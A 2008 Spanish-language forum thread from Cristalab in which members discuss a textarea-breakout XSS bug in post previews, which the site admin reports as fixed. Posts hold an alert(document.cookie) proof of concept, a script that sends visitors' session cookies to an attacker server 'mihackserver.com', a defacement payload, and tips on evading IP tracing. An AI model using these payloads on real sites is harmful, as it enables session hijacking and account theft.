ATAQUE POR XSS A CRISTALAB.

Citar

Escrito el 06 Jun 2008 08:49 am

Si me quoteas este post, y luego le das a "previsualizar", puedo atacar por cross-scripting tu sesión en Cristalab.

El error se produce al poner "< / T E X T A R E A >" en un post.
Ello hace que lo reconozca como final del post, y todo lo demás pasa a ejecutarse.
(curiosamente, el BUG-DE-LAS-COMILLAS, dificulta un poco seguir usando la vulnerabilidad, pero sería cuestión de ponerse a ver cómo seguir aprovechándola)

suerte a los que se encarguen de arreglarla.
:wink:

PRUEBA DE CONCEPTO ABAJO:
Este pequeño código, ataca tu sesión, descubriendo tu cookie de sesión en Cristalab.

Código :

</textarea>
<script>
alert(document.cookie);
</script>

Por El Oso Amoroso

Claber

1780 de clabLevel

6 tutoriales

Envíale un mensaje privado

Madrid, España, Europa, Eurasia, La Tierra, Sist.Solar, Vía Láctea, UNIVERSO

Citar

Escrito el 06 Jun 2008 02:04 pm

mwahahaha, excelente rizome :alabado:

En efecto el XSS se produce.

Yo acostumbro navegar en clab con javascript desactivado, con noScript en firefox, asi que supongo que es camino, en el rato que freddie tarde en arreglar el asunto jajaja

buen trabajo rizome

Por rolv

Claber

2000 de clabLevel

3 tutoriales

Envíale un mensaje privado

@olv3ra

Citar

Escrito el 06 Jun 2008 02:05 pm

Pequeño embrollo esta naciendo en Clab, antes tan pacifico que estaba todo...
Aaah, y ya lo probe, tienes razon Rizome !

Por M@U

BOFH

6210 de clabLevel

34 tutoriales
5 articulos

Genero:Masculino Héroes Bastard Operators From Hell Editores

Envíale un mensaje privado Web

Bate jubilado de Cristalab

@maucristalabcom

Citar

Escrito el 06 Jun 2008 03:42 pm

Interesante.

Gracias a este post obtuve la pista definitiva para encontrar la solución al problema de las comillas al previsualizar. Ahora tanto este problema como el bug de las comillas están solucionados y una vez más la paz vuelve a reinar.

Y así termina el momento heroico del día.

Por Freddie

BOFH

53 tutoriales
597 articulos
43 ejemplos

Genero:Masculino Admin

Envíale un mensaje privado Web

Conserje de Cristalab

@freddier

Citar

Escrito el 06 Jun 2008 03:53 pm

El problema, no es ver la cookie, es que puedas meter html.
Para ver la cookie, estando en cualquier parte de cristalab, pongan el barra de direcciones esto:
javascript:alert(document.cookie);
Y listo, ven la cookie.

Mas que nada aclaro por esto:

Código :

Este pequeño código, ataca tu sesión, descubriendo tu cookie de sesión en Cristalab.

Ese pequeño código, no ataca nada, descubrir una cookie local, es normal, no es vulnerabilidad.

Repito la vulnerabilidad y grave, es que puedes meter html a mano(no el hecho de ver la cookie, eso se puede hacer en cualquier sitio y por eso todas las cookies estan cifradas).

Saludos

Por Dano

BOFH

4273 de clabLevel

14 tutoriales
4 articulos
10 ejemplos

Genero:Masculino Bastard Operators From Hell Premio_Secretos

Envíale un mensaje privado Web

Lugar estratégico para vigilarte

@javierdaniel

Citar

Escrito el 06 Jun 2008 04:00 pm

Dano escribió:

Mas que nada aclaro por esto:

Código :

Este pequeño código, ataca tu sesión, descubriendo tu cookie de sesión en Cristalab.

Ese pequeño código, no ataca nada, descubrir una cookie local, es normal, no es vulnerabilidad.

Repito la vulnerabilidad y grave, es que puedes meter html a mano(no el hecho de ver la cookie, eso se puede hacer en cualquier sitio y por eso todas las cookies estan cifradas).

Igual creo que el vector de ataque aquí sería generar una consulta "POST" para borrar temas del foro o publicar en zonas protegidas, usando JS, de modo que un BOFH que le de quote y previsualizar a un post de rizome ejecute, sin saber, esa acción.

Por supuesto, esto tiene la condición que nosotros sabremos inmediatamente que rizome (O quien coloque el código) es el culpable, puesto que el código de ataque está muy visible. Por lo que sería más un ataque que sirve para crear un usuario nuevo o anonimo.

Igual, sea como sea, este error y el de las comillas ya están solucionados.

Por Freddie

BOFH

53 tutoriales
597 articulos
43 ejemplos

Genero:Masculino Admin

Envíale un mensaje privado Web

Conserje de Cristalab

@freddier

Citar

Escrito el 06 Jun 2008 04:08 pm

Que bien que esta resuelto. Entonces ahora si procedo a explicar otra forma de ataque:

Código :

<script>
document.write('<im'+'g src="http://www.mihackserver.com/ArchivoHack.php?LaCookie'+escape(document.cookie)+' />');
</script>

De esta forma enviamos la cookie de un usuario al servidor mihackserver.com, a una página ArchivoHack, que recibe la cookie y le envia un mail a su dueño avisando que tiene una nueva credencial. El dueño del hack, abre su admin(si, porque el cabr0n hasta admin hizo para eso), ve la cookie, genera el archivo, lo translada a su PC, entra a cristalab y listo, esta logueado con la sesion de la víctima.

Favor de no intentarlo en casa.

Por Dano

BOFH

4273 de clabLevel

14 tutoriales
4 articulos
10 ejemplos

Genero:Masculino Bastard Operators From Hell Premio_Secretos

Envíale un mensaje privado Web

Lugar estratégico para vigilarte

@javierdaniel

Citar

Escrito el 06 Jun 2008 04:15 pm

Dano escribió:

[...]De esta forma enviamos la cookie de un usuario al servidor mihackserver.com, a una página ArchivoHack, que recibe la cookie y le envia un mail a su dueño avisando que tiene una nueva credencial. El dueño del hack, abre su admin(si, porque el cabr0n hasta admin hizo para eso), ve la cookie, genera el archivo, lo translada a su PC, entra a cristalab y listo, esta logueado con la sesion de la víctima.

Favor de no intentarlo en casa.

Pero por suerte, aqui los BOFH y SWAT tienen caminos para reconocer la Ip de cada usuario, y asi detectar quien robo la cuenta de cada quien.

Por M@U

BOFH

6210 de clabLevel

34 tutoriales
5 articulos

Genero:Masculino Héroes Bastard Operators From Hell Editores

Envíale un mensaje privado Web

Bate jubilado de Cristalab

@maucristalabcom

Citar

Escrito el 06 Jun 2008 04:18 pm

M@U escribió:

Pero por suerte, aqui los BOFH y SWAT tienen caminos para reconocer la Ip de cada usuario, y asi detectar quien robo la cuenta de cada quien.

La detección por IP es inutil para un atacante decidido y con cierta habilidad tecnica. Usando un proxy altamente anonimo o un spoof de IP es facil pasar indetectado como un anonimo más. O más sencillo, si se tiene una conexión con IP dinamica, es cuestión de resetear el router.

Por Freddie

BOFH

53 tutoriales
597 articulos
43 ejemplos

Genero:Masculino Admin

Envíale un mensaje privado Web

Conserje de Cristalab

@freddier

Citar

Escrito el 06 Jun 2008 05:38 pm

Pero por suerte, aqui los BOFH y SWAT tienen caminos para reconocer la Ip de cada usuario, y asi detectar quien robo la cuenta de cada quien.

Cuando haces un ataque o algo similar y estas mostrando tu verdadera IP, es que simplemente eres un script kiddie.

De hecho esa era la intención(o mensaje subliminal) detrás de esto:

"Favor de no intentarlo en casa."

Aplica mas metafóricamente que literalmente, ya que precisamente algunos intentan "atacar", pero no cuidan su IP. Por lo que el anonimato que ellos creen tener, simplemente no existe.

Por Dano

BOFH

4273 de clabLevel

14 tutoriales
4 articulos
10 ejemplos

Genero:Masculino Bastard Operators From Hell Premio_Secretos

Envíale un mensaje privado Web

Lugar estratégico para vigilarte

@javierdaniel

Citar

Escrito el 06 Jun 2008 05:56 pm

Dano escribió:

Código :

<script>
document.write('<im'+'g src="http://www.mihackserver.com/ArchivoHack.php?LaCookie'+escape(document.cookie)+' />');
</script>

De esta forma enviamos la cookie de un usuario al servidor mihackserver.com, a una página ArchivoHack, que recibe la cookie y le envia un mail a su dueño avisando que tiene una nueva credencial.

Efectivamente, a eso me refería.
Lo que puse, sólo era una prueba de concepto, para mostrar que podría (de alguna manera), ejecutar un script.
(y no a simplemente mostrarte un alert con tu cookie ) :lol:

Me alegro pues que este problema haya quedado resuelto.
Y más aun... resuelto el BUG DE LAS COMILLAS.

¿¿No merezo una medallita??
U_U

Por El Oso Amoroso

Claber

1780 de clabLevel

6 tutoriales

Envíale un mensaje privado

Madrid, España, Europa, Eurasia, La Tierra, Sist.Solar, Vía Láctea, UNIVERSO

Citar

Escrito el 06 Jun 2008 06:45 pm

Freddie escribió:

Interesante.

Gracias a este post obtuve la pista definitiva para encontrar la solución al problema de las comillas al previsualizar. Ahora tanto este problema como el bug de las comillas están solucionados y una vez más la paz vuelve a reinar.

Y así termina el momento heroico del día.

Genial, pero me sabe mal lo de no poder probar lo del html

Por Bleend

Claber

3385 de clabLevel

10 tutoriales
4 articulos

Genero:Masculino Héroes

Envíale un mensaje privado Email Web

Barcelona

@bleend

Citar

Escrito el 06 Jun 2008 07:04 pm

Que lástima que todas estas enseñanzas no le llegaron a tiempo a cierta gente interesada U_U

Por Nito

790 de clabLevel

Envíale un mensaje privado Email

Transformado en 100111101000011

@Nitocat

Citar

Escrito el 06 Jun 2008 07:10 pm

rizome escribió:

¿¿No merezo una medallita??

Podría haber sido, pero la forma como lo manejaste (Publicamente, con tantos bombos como fue posible, sin darnos la oportunidad de arreglarlo antes que alguien pudiera hacerse cargo [yo] ) hace que no.

Sigue intentando para la proxima.

Por Freddie

BOFH

53 tutoriales
597 articulos
43 ejemplos

Genero:Masculino Admin

Envíale un mensaje privado Web

Conserje de Cristalab

@freddier

Citar

Escrito el 06 Jun 2008 07:18 pm

Freddie escribió:

rizome escribió:

¿No merezo una medallita?

Podría haber sido, pero la forma como lo manejaste (Publicamente, con tantos bombos como fue posible, sin darnos la oportunidad de arreglarlo antes que alguien pudiera hacerse cargo [yo] ) hace que no.

Sigue intentando para la proxima.

Imagina si a alguien se le hubiese ocurrido (antes de la solucion al problema) ensuciar algunos foros por ahi con:

Código :

</textarea><script>
  document.documentElement.innerHTML="...";
</script>

Por M@U

BOFH

6210 de clabLevel

34 tutoriales
5 articulos

Genero:Masculino Héroes Bastard Operators From Hell Editores

Envíale un mensaje privado Web

Bate jubilado de Cristalab

@maucristalabcom

Citar

Escrito el 06 Jun 2008 08:00 pm

Freddie escribió:

Interesante.

Gracias a este post obtuve la pista definitiva para encontrar la solución al problema de las comillas al previsualizar. Ahora tanto este problema como el bug de las comillas están solucionados y una vez más la paz vuelve a reinar.

Y así termina el momento heroico del día.

TOMALOO!!!!!1111!!! jejejeje
Imagino que ha rizome se le acabo la ilusion :lol:

Freddie escribió:

Por supuesto, esto tiene la condición que nosotros sabremos inmediatamente que rizome (O quien coloque el código) es el culpable, puesto que el código de ataque está muy visible. Por lo que sería más un ataque que sirve para crear un usuario nuevo o anonimo.

Y al momento de detectar al atacante recibira sus merecidos :bate:

Freddie escribió:

La detección por IP es inutil para un atacante decidido y con cierta habilidad tecnica. Usando un proxy altamente anonimo o un spoof de IP es facil pasar indetectado como un anonimo más. O más sencillo, si se tiene una conexión con IP dinamica, es cuestión de resetear el router.

Si mas no me equivoco, lo mas lejos que se podria rastrear seria hasta la ubicacion de tu ISP. claro lo que cerraria tu ubicacion de manera regional en el mapa no daria una ubicaion especifica del atacante. creo...

Creo que seria mas facil rastrear un cabello en la calva de la 100rra que obtener la localizacion exacta :lol:

Por Jackguardian

39 de clabLevel

Genero:Masculino

Envíale un mensaje privado Email

Citar

Escrito el 06 Jun 2008 08:29 pm

Freddie escribió:

[...]Sigue intentando para la proxima.

Malo.
Seguiré buscando.

:lol:

PD: Creí que habría más gente buena, que mala... U_U

y que así se daría cuenta antes cualquier admin... pues... ¿a quién se escribe en estos casos...? ¿A toda la lista? ¿Qué lista? ¿y si F no está, y el PM se queda sin leer...?